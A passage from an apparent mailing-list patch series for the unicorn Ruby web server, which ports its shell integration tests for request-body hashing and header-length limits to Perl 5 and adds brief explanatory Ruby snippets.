+			print $out $buf;
+			$clen -= $r;
+		}
+	},
+);
+
 my ($c, $status, $hdr);
 
 # response header tests
@@ -111,6 +156,55 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
 
+# input tests
+my ($blob_size, $blob_hash);
+SKIP: {
+	open(my $rh, '<', 't/random_blob') or
+		skip "t/random_blob not generated $!", 1;
+	$blob_size = -s $rh;
+	require Digest::SHA;
+	$blob_hash = Digest::SHA->new(1)->addfile($rh)->hexdigest;
+
+	my $ck_hash = sub {
+		my ($sub, $path, %opt) = @_;
+		seek($rh, 0, SEEK_SET) // die "seek: $!";
+		$c = tcp_connect($srv);
+		$c->autoflush(0);
+		$PUT{$sub}->($rh, $c, $path, %opt);
+		$c->flush or die "flush: $!";
+		($status, $hdr) = slurp_hdr($c);
+		is(readline($c), $blob_hash, "$sub $path");
+	};
+	$ck_hash->('identity', '/rack_input', -s => $blob_size);
+	$ck_hash->('chunked_md5', '/rack_input');
+	$ck_hash->('identity', '/rack_input/size_first', -s => $blob_size);
+	$ck_hash->('identity', '/rack_input/rewind_first', -s => $blob_size);
+	$ck_hash->('chunked_md5', '/rack_input/size_first');
+	$ck_hash->('chunked_md5', '/rack_input/rewind_first');
+
+
+	$curl // skip 'no curl found in PATH', 1;
+
+	my ($copt, $cout);
+	my $url = "http://$host_port/rack_input";
+	my $do_curl = sub {
+		my (@arg) = @_;
+		pipe(my $cout, $copt->{1}) or die "pipe: $!";
+		open $copt->{2}, '>', "$tmpdir/curl.err" or die $!;
+		my $cpid = spawn($curl, '-sSf', @arg, $url, $copt);
+		close(delete $copt->{1}) or die "close: $!";
+		is(readline($cout), $blob_hash, "curl @arg response");
+		is(waitpid($cpid, 0), $cpid, "curl @arg exited");
+		is($?, 0, "no error from curl @arg");
+		is(slurp("$tmpdir/curl.err"), '', "no stderr from curl @arg");
+	};
+
+	$do_curl->(qw(-T t/random_blob));
+
+	seek($rh, 0, SEEK_SET) // die "seek: $!";
+	$copt->{0} = $rh;
+	$do_curl->('-T-');
+}
 
 # ... more stuff here
 undef $ar;
@@ -120,4 +214,5 @@ my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
 is_deeply(\@err, [], 'no unexpected errors in stderr');
 is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
 
+undef $tmpdir;
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 7d712b5..ae9f197 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req);
+	SEEK_SET tcp_host_port start_req which spawn);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -193,4 +193,5 @@ Test::More->import;
 # try to ensure ->DESTROY fires:
 $SIG{TERM} = sub { exit(15 + 128) };
 $SIG{INT} = sub { exit(2 + 128) };
+$SIG{PIPE} = sub { exit(13 + 128) };
 1;
diff --git a/t/rack-input-tests.ru b/t/rack-input-tests.ru
deleted file mode 100644
index 5459e85..0000000
--- a/t/rack-input-tests.ru
+++ /dev/null
@@ -1,21 +0,0 @@
-# SHA1 checksum generator
-require 'digest/sha1'
-use Rack::ContentLength
-cap = 16384
-app = lambda do |env|
-  /\A100-continue\z/i =~ env['HTTP_EXPECT'] and
-    return [ 100, {}, [] ]
-  digest = Digest::SHA1.new
-  input = env['rack.input']
-  input.size if env["PATH_INFO"] == "/size_first"
-  input.rewind if env["PATH_INFO"] == "/rewind_first"
-  if buf = input.read(rand(cap))
-    begin
-      raise "#{buf.size} > #{cap}" if buf.size > cap
-      digest.update(buf)
-    end while input.read(rand(cap), buf)
-  end
-
-  [ 200, {'content-type' => 'text/plain'}, [ digest.hexdigest << "\n" ] ]
-end
-run app
diff --git a/t/t0100-rack-input-tests.sh b/t/t0100-rack-input-tests.sh
deleted file mode 100755
index ee7a437..0000000
--- a/t/t0100-rack-input-tests.sh
+++ /dev/null
@@ -1,124 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-test -r random_blob || die "random_blob required, run with 'make $0'"
-
-t_plan 10 "rack.input read tests"
-
-t_begin "setup and startup" && {
-	rtmpfiles curl_out curl_err
-	unicorn_setup
-	unicorn -E none -D rack-input-tests.ru -c $unicorn_config
-	blob_sha1=$(rsha1 < random_blob)
-	blob_size=$(count_bytes < random_blob)
-	t_info "blob_sha1=$blob_sha1"
-	unicorn_wait_start
-}
-
-t_begin "corked identity request" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT / HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		content-md5-put < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked identity request (input#size first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /size_first HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked identity request (input#rewind first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /rewind_first HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request (input#size first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /size_first HTTP/1.1\r\n'
-		printf 'Host: example.com\r\n'
-		printf 'Transfer-Encoding: chunked\r\n'
-		printf 'Trailer: Content-MD5\r\n'
-		printf '\r\n'
-		content-md5-put --no-headers < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request (input#rewind first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /rewind_first HTTP/1.1\r\n'
-		printf 'Host: example.com\r\n'
-		printf 'Transfer-Encoding: chunked\r\n'
-		printf 'Trailer: Content-MD5\r\n'
-		printf '\r\n'
-		content-md5-put --no-headers < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "regular request" && {
-	curl -sSf -T random_blob http://$listen/ > $curl_out 2> $curl_err
-        test x$blob_sha1 = x$(cat $curl_out)
-        test ! -s $curl_err
-}
-
-t_begin "chunked request" && {
-	curl -sSf -T- < random_blob http://$listen/ > $curl_out 2> $curl_err
-        test x$blob_sha1 = x$(cat $curl_out)
-        test ! -s $curl_err
-}
-
-dbgcat r_err
-
-t_begin "shutdown" && {
-	kill $unicorn_pid
-}
-
-t_done

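The `chunked_md5` writer in t/integration.t above emits each read as a hex-length-prefixed chunk and ends with a `Content-MD5` trailer. A rough Ruby mirror of that wire format may be easier to follow for Rubyists (the helper name and the tiny block size here are illustrative; note Perl's `b64digest` omits the `=` padding that Ruby's base64 keeps):

```ruby
require 'digest/md5'
require 'stringio'

# illustrative Ruby mirror of the Perl chunked_md5 writer:
# hex chunk-size line, chunk data, CRLF, then a Content-MD5 trailer
def chunked_md5(input, output, bs: 16384)
  dig = Digest::MD5.new
  while (buf = input.read(bs))
    output << format("%x\r\n", buf.bytesize) << buf << "\r\n"
    dig.update(buf)
  end
  output << "0\r\nContent-MD5: #{[dig.digest].pack('m0')}\r\n\r\n"
end

body = +''
chunked_md5(StringIO.new('hello world'), body, bs: 4)
print body
```

With `bs: 4` the input is split into `hell`, `o wo`, `rld` chunks before the zero-length chunk and trailer.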
[-- Attachment #10: 0009-tests-use-autodie-to-simplify-error-checking.patch --]
[-- Type: text/x-diff, Size: 8495 bytes --]

From 3a1d015a3859b639d8e4463e9436a49f4f0f720e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:38 +0000
Subject: [PATCH 09/23] tests: use autodie to simplify error checking

autodie is bundled with Perl 5.10+ and simplifies error
checking in most cases.  Some subroutines aren't perfectly
translatable and their call sites had to be tweaked, but
most of them are.
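For Rubyists following along: autodie gives Perl's open/close/pipe the raise-on-failure behavior Ruby's IO layer has by default, which is why the Perl call sites below can drop their `or die "...: $!"` suffixes. A small sketch of the contrast (the path is made up):

```ruby
# Ruby raises on failure by default, like Perl under autodie:
begin
  File.open('/nonexistent/u1.conf.rb')
rescue Errno::ENOENT => e
  puts "open failed: #{e.message}"
end

# Perl without autodie returns false instead, so every call needs a
# manual check, e.g.:  open(my $fh, '<', $path) or die "open($path): $!";
```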
---
 t/active-unix-socket.t | 13 +++++++------
 t/integration.t        | 37 +++++++++++++++++++------------------
 t/lib.perl             | 30 +++++++++++++++---------------
 3 files changed, 41 insertions(+), 39 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 6b5c218..1241904 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -4,17 +4,18 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use IO::Socket::UNIX;
+use autodie;
+no autodie 'kill';
 my %to_kill;
 END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
 my $unix_req = sub {
 	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
-	print $s @_, "\r\n\r\n" or die $!;
+	print $s @_, "\r\n\r\n";
 	$s;
 };
 {
-	use autodie;
 	open my $fh, '>', "$tmpdir/u1.conf.rb";
 	print $fh <<EOM;
 pid "$tmpdir/u.pid"
@@ -43,8 +44,8 @@ EOM
 my @uarg = qw(-D -E none t/integration.ru);
 
 # this pipe will be used to notify us when all daemons die:
-pipe(my ($p0, $p1)) or die "pipe: $!";
-fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+pipe(my $p0, my $p1);
+fcntl($p1, POSIX::F_SETFD, 0);
 
 # start the first instance
 unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
@@ -93,8 +94,8 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 
 # restart the first instance
 {
-	pipe(($p0, $p1)) or die "pipe: $!";
-	fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+	pipe($p0, $p1);
+	fcntl($p1, POSIX::F_SETFD, 0);
 	unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
 	is($?, 0, 'daemonized 1st process');
 	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
diff --git a/t/integration.t b/t/integration.t
index 8cef561..af17d51 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -5,6 +5,7 @@
 # restarting or signals
 
 use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
@@ -34,7 +35,7 @@ Trailer: Content-MD5\r
 EOM
 		my ($buf, $r);
 		while (1) {
-			$r = read($in, $buf, $bs) // die "read: $!";
+			$r = read($in, $buf, $bs);
 			last if $r == 0;
 			printf $out "%x\r\n", length($buf);
 			print $out $buf, "\r\n";
@@ -54,7 +55,7 @@ EOM
 		my ($buf, $r, $len);
 		while ($clen) {
 			$len = $clen > $bs ? $bs : $clen;
-			$r = read($in, $buf, $len) // die "read: $!";
+			$r = read($in, $buf, $len);
 			die 'premature EOF' if $r == 0;
 			print $out $buf;
 			$clen -= $r;
@@ -130,28 +131,28 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /' or die $!;
+	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
-	for (0..1023) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..1023) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on REQUEST_PATH > (12 * 1024)');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /hello-world?a' or die $!;
+	print $c 'GET /hello-world?a';
 	$buf = join('', (0..9));
-	for (0..1023) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..1023) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on QUERY_STRING > (10 * 1024)');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /hello-world#a' or die $!;
+	print $c 'GET /hello-world#a';
 	$buf = join('', (0..9), 'a'..'f');
-	for (0..63) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..63) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
@@ -159,7 +160,7 @@ if ('bad requests') {
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
-	open(my $rh, '<', 't/random_blob') or
+	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
 	require Digest::SHA;
@@ -167,11 +168,11 @@ SKIP: {
 
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
-		seek($rh, 0, SEEK_SET) // die "seek: $!";
+		seek($rh, 0, SEEK_SET);
 		$c = tcp_connect($srv);
 		$c->autoflush(0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
-		$c->flush or die "flush: $!";
+		$c->flush or die $!;
 		($status, $hdr) = slurp_hdr($c);
 		is(readline($c), $blob_hash, "$sub $path");
 	};
@@ -189,10 +190,10 @@ SKIP: {
 	my $url = "http://$host_port/rack_input";
 	my $do_curl = sub {
 		my (@arg) = @_;
-		pipe(my $cout, $copt->{1}) or die "pipe: $!";
-		open $copt->{2}, '>', "$tmpdir/curl.err" or die $!;
+		pipe(my $cout, $copt->{1});
+		open $copt->{2}, '>', "$tmpdir/curl.err";
 		my $cpid = spawn($curl, '-sSf', @arg, $url, $copt);
-		close(delete $copt->{1}) or die "close: $!";
+		close(delete $copt->{1});
 		is(readline($cout), $blob_hash, "curl @arg response");
 		is(waitpid($cpid, 0), $cpid, "curl @arg exited");
 		is($?, 0, "no error from curl @arg");
@@ -201,7 +202,7 @@ SKIP: {
 
 	$do_curl->(qw(-T t/random_blob));
 
-	seek($rh, 0, SEEK_SET) // die "seek: $!";
+	seek($rh, 0, SEEK_SET);
 	$copt->{0} = $rh;
 	$do_curl->('-T-');
 }
diff --git a/t/lib.perl b/t/lib.perl
index ae9f197..49632cf 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -4,6 +4,7 @@
 package UnicornTest;
 use v5.14;
 use parent qw(Exporter);
+use autodie;
 use Test::More;
 use IO::Socket::INET;
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
@@ -14,7 +15,7 @@ our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
-open($errfh, '>>', "$tmpdir/err.log") or die "open: $!";
+open($errfh, '>>', "$tmpdir/err.log");
 
 sub tcp_server {
 	my %opt = (
@@ -62,14 +63,14 @@ sub tcp_connect {
 sub start_req {
 	my ($srv, @req) = @_;
 	my $c = tcp_connect($srv);
-	print $c @req, "\r\n\r\n" or die "print: $!";
+	print $c @req, "\r\n\r\n";
 	$c;
 }
 
 sub slurp {
-	open my $fh, '<', $_[0] or die "open($_[0]): $!";
+	open my $fh, '<', $_[0];
 	local $/;
-	<$fh>;
+	readline($fh);
 }
 
 sub spawn {
@@ -80,8 +81,8 @@ sub spawn {
 	my $set = POSIX::SigSet->new;
 	$set->fillset or die "sigfillset: $!";
 	sigprocmask(SIG_SETMASK, $set, $old) or die "SIG_SETMASK: $!";
-	pipe(my ($r, $w)) or die "pipe: $!";
-	my $pid = fork // die "fork: $!";
+	pipe(my $r, my $w);
+	my $pid = fork;
 	if ($pid == 0) {
 		close $r;
 		$SIG{__DIE__} = sub {
@@ -94,9 +95,9 @@ sub spawn {
 		my $cfd;
 		for ($cfd = 0; ($cfd < 3) || defined($opt->{$cfd}); $cfd++) {
 			my $io = $opt->{$cfd} // next;
-			my $pfd = fileno($io) // die "fileno($io): $!";
+			my $pfd = fileno($io);
 			if ($pfd == $cfd) {
-				fcntl($io, F_SETFD, 0) // die "F_SETFD: $!";
+				fcntl($io, F_SETFD, 0);
 			} else {
 				dup2($pfd, $cfd) // die "dup2($pfd, $cfd): $!";
 			}
@@ -110,9 +111,7 @@ sub spawn {
 			setpgid(0, $pgid) // die "setpgid(0, $pgid): $!";
 		}
 		$SIG{$_} = 'DEFAULT' for grep(!/^__/, keys %SIG);
-		if (defined(my $cd = $opt->{-C})) {
-			chdir $cd // die "chdir($cd): $!";
-		}
+		if (defined(my $cd = $opt->{-C})) { chdir $cd }
 		$old->delset(POSIX::SIGCHLD) or die "sigdelset CHLD: $!";
 		sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK: ~CHLD: $!";
 		@ENV{keys %$env} = values(%$env) if $env;
@@ -162,22 +161,23 @@ sub unicorn {
 # automatically kill + reap children when this goes out-of-scope
 package UnicornTest::AutoReap;
 use v5.14;
+use autodie;
 
 sub new {
 	my (undef, $pid) = @_;
 	bless { pid => $pid, owner => $$ }, __PACKAGE__
 }
 
-sub kill {
+sub do_kill {
 	my ($self, $sig) = @_;
-	CORE::kill($sig // 'TERM', $self->{pid});
+	kill($sig // 'TERM', $self->{pid});
 }
 
 sub join {
 	my ($self, $sig) = @_;
 	my $pid = delete $self->{pid} or return;
-	CORE::kill($sig, $pid) if defined $sig;
-	my $ret = waitpid($pid, 0) // die "waitpid($pid): $!";
+	kill($sig, $pid) if defined $sig;
+	my $ret = waitpid($pid, 0);
 	$ret == $pid or die "BUG: waitpid($pid) != $ret";
 }
 

[-- Attachment #11: 0010-port-t0019-max_header_len.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 5571 bytes --]

From 43c7d73b8b9e6995b5a986b10a8623395e89a538 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:39 +0000
Subject: [PATCH 10/23] port t0019-max_header_len.sh to Perl 5

This was the final socat requirement for integration tests.
I think curl will remain an optional dependency for tests
since it's probably the most widely-installed HTTP client.
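The `which` helper exported from t/lib.perl amounts to a PATH scan for the curl executable; a minimal Ruby equivalent of the same idea (the helper name matches the Perl one, the body is an illustrative sketch, not the test library's code):

```ruby
# minimal PATH lookup, similar in spirit to which() in t/lib.perl
def which(cmd)
  ENV['PATH'].split(File::PATH_SEPARATOR).each do |dir|
    path = File.join(dir, cmd)
    return path if File.file?(path) && File.executable?(path)
  end
  nil # absent: caller can skip curl-dependent tests
end

puts which('sh')                  # e.g. "/bin/sh" on most systems
puts which('no-such-tool').inspect
```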
---
 GNUmakefile               |  2 +-
 t/README                  |  7 +-----
 t/integration.ru          |  1 +
 t/integration.t           | 43 +++++++++++++++++++++++++++++++---
 t/t0019-max_header_len.sh | 49 ---------------------------------------
 5 files changed, 43 insertions(+), 59 deletions(-)
 delete mode 100755 t/t0019-max_header_len.sh

diff --git a/GNUmakefile b/GNUmakefile
index 5cca189..eab9082 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -125,7 +125,7 @@ $(T_sh): dep $(test_prereq) t/random_blob t/trash/.gitignore
 t/trash/.gitignore : | t/trash
 	echo '*' >$@
 
-dependencies := socat curl
+dependencies := curl
 deps := $(addprefix t/.dep+,$(dependencies))
 $(deps): dep_bin = $(lastword $(subst +, ,$@))
 $(deps):
diff --git a/t/README b/t/README
index 8a5243e..d09c715 100644
--- a/t/README
+++ b/t/README
@@ -10,18 +10,13 @@ to test real-world behavior and Ruby introduces incompatibilities
 at a far faster rate than Perl 5.  Perl is Ruby's older cousin, so
 it should be easy-to-learn for Rubyists.
 
-Old tests are in Bourne shell, but the socat(1) dependency was probably
-too rare compared to Perl 5.
+Old tests are in Bourne shell and slowly being ported to Perl 5.
 
 == Requirements
 
 * {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
 * {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
-
-The following requirements will eventually be dropped.
-
-* {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[https://curl.haxx.se/]
 
 We do not use bashisms or any non-portable, non-POSIX constructs
diff --git a/t/integration.ru b/t/integration.ru
index 98528f6..edc408c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -81,6 +81,7 @@ def rack_input_tests(env)
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
+    else; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/integration.t b/t/integration.t
index af17d51..c687655 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -1,15 +1,19 @@
 #!perl -w
 # Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
-# this is the main integration test for things which don't require
-# restarting or signals
+
+# This is the main integration test for fast-ish things to minimize
+# Ruby startup time penalties.
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
-my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
+my $conf = "$tmpdir/u.conf.rb";
+open my $conf_fh, '>', $conf;
+$conf_fh->autoflush(1);
+my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
 END { diag slurp("$tmpdir/err.log") if $tmpdir };
 sub slurp_hdr {
@@ -207,7 +211,40 @@ SKIP: {
 	$do_curl->('-T-');
 }
 
+
 # ... more stuff here
+
+# SIGHUP-able stuff goes here
+
+if ('max_header_len internal API') {
+	undef $c;
+	my $req = 'GET / HTTP/1.0';
+	my $len = length($req."\r\n\r\n");
+	my $fifo = "$tmpdir/fifo";
+	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+	print $conf_fh <<EOM;
+Unicorn::HttpParser.max_header_len = $len
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	$ar->do_kill('HUP');
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	close $fifo_fh;
+	$wpid =~ s/\Apid=// or die;
+	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
+
+	$c = start_req($srv, $req);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'minimal request succeeds');
+
+	$c = start_req($srv, 'GET /xxxxxx HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 413\b!, 'big request fails');
+}
+
+
 undef $ar;
 my @log = slurp("$tmpdir/err.log");
 diag("@log") if $ENV{V};
diff --git a/t/t0019-max_header_len.sh b/t/t0019-max_header_len.sh
deleted file mode 100755
index 6a355b4..0000000
--- a/t/t0019-max_header_len.sh
+++ /dev/null
@@ -1,49 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 5 "max_header_len setting (only intended for Rainbows!)"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	req='GET / HTTP/1.0\r\n\r\n'
-	len=$(printf "$req" | count_bytes)
-	echo Unicorn::HttpParser.max_header_len = $len >> $unicorn_config
-	unicorn -D -c $unicorn_config env.ru
-	unicorn_wait_start
-}
-
-t_begin "minimal request succeeds" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf "$req"
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-
-	fgrep "HTTP/1.1 200 OK" $tmp
-}
-
-t_begin "big request fails" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'GET /xxxxxx HTTP/1.0\r\n\r\n'
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-	fgrep "HTTP/1.1 413" $tmp
-}
-
-dbgcat tmp
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #12: 0011-test_exec-drop-sd_listen_fds-emulation-test.patch --]
[-- Type: text/x-diff, Size: 1751 bytes --]

From 5d828a4ef7683345bcf2ff659442fed0a6fb7a97 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:40 +0000
Subject: [PATCH 11/23] test_exec: drop sd_listen_fds emulation test

The Perl 5 tests already rely on this implicitly, and there was
never a point when Perl 5 couldn't emulate systemd behavior.
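The emulation being dropped is simple to reproduce: systemd hands listeners to the child starting at FD 3 and identifies itself via the LISTEN_PID and LISTEN_FDS environment variables. A self-contained Ruby sketch of the same trick the deleted test used (the inline child script is illustrative, not the test's code):

```ruby
require 'socket'
require 'rbconfig'

srv = TCPServer.new('127.0.0.1', 0)
port = srv.addr[1]

# child: verify the systemd handoff protocol, then serve one request on FD 3
child = <<~'RUBY'
  abort 'LISTEN_PID mismatch' unless ENV['LISTEN_PID'].to_i == Process.pid
  abort 'LISTEN_FDS != 1' unless ENV['LISTEN_FDS'] == '1'
  require 'socket'
  ls = TCPServer.for_fd(3) # 3 == SD_LISTEN_FDS_START
  c = ls.accept
  c.write "HI\n"
  c.close
RUBY

pid = fork do
  ENV['LISTEN_PID'] = Process.pid.to_s # exec(2) preserves the PID
  ENV['LISTEN_FDS'] = '1'
  exec(RbConfig.ruby, '-e', child, 3 => srv) # inherit the listener as FD 3
end
srv.close
res = TCPSocket.new('127.0.0.1', port).read
print res
Process.waitpid(pid)
```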
---
 test/exec/test_exec.rb | 33 ---------------------------------
 1 file changed, 33 deletions(-)

diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 2929b2e..1d3a0fd 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -97,39 +97,6 @@ def teardown
     end
   end
 
-  def test_sd_listen_fds_emulation
-    # [ruby-core:69895] [Bug #11336] fixed by r51576
-    return if RUBY_VERSION.to_f < 2.3
-
-    File.open("config.ru", "wb") { |fp| fp.write(HI) }
-    sock = TCPServer.new(@addr, @port)
-
-    [ %W(-l #@addr:#@port), nil ].each do |l|
-      sock.setsockopt(:SOL_SOCKET, :SO_KEEPALIVE, 0)
-
-      pid = xfork do
-        redirect_test_io do
-          # pretend to be systemd
-          ENV['LISTEN_PID'] = "#$$"
-          ENV['LISTEN_FDS'] = '1'
-
-          # 3 = SD_LISTEN_FDS_START
-          args = [ $unicorn_bin ]
-          args.concat(l) if l
-          args << { 3 => sock }
-          exec(*args)
-        end
-      end
-      res = hit(["http://#@addr:#@port/"])
-      assert_equal [ "HI\n" ], res
-      assert_shutdown(pid)
-      assert sock.getsockopt(:SOL_SOCKET, :SO_KEEPALIVE).bool,
-                  'unicorn should always set SO_KEEPALIVE on inherited sockets'
-    end
-  ensure
-    sock.close if sock
-  end
-
   def test_inherit_listener_unspecified
     File.open("config.ru", "wb") { |fp| fp.write(HI) }
     sock = TCPServer.new(@addr, @port)

[-- Attachment #13: 0012-test_exec-drop-test_basic-and-test_config_ru_alt_pat.patch --]
[-- Type: text/x-diff, Size: 1667 bytes --]

From 548593c6b3d52a4bebd52542ad9c423ed2b7252d Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:41 +0000
Subject: [PATCH 12/23] test_exec: drop test_basic and test_config_ru_alt_path

We already have coverage for these basic things elsewhere.
---
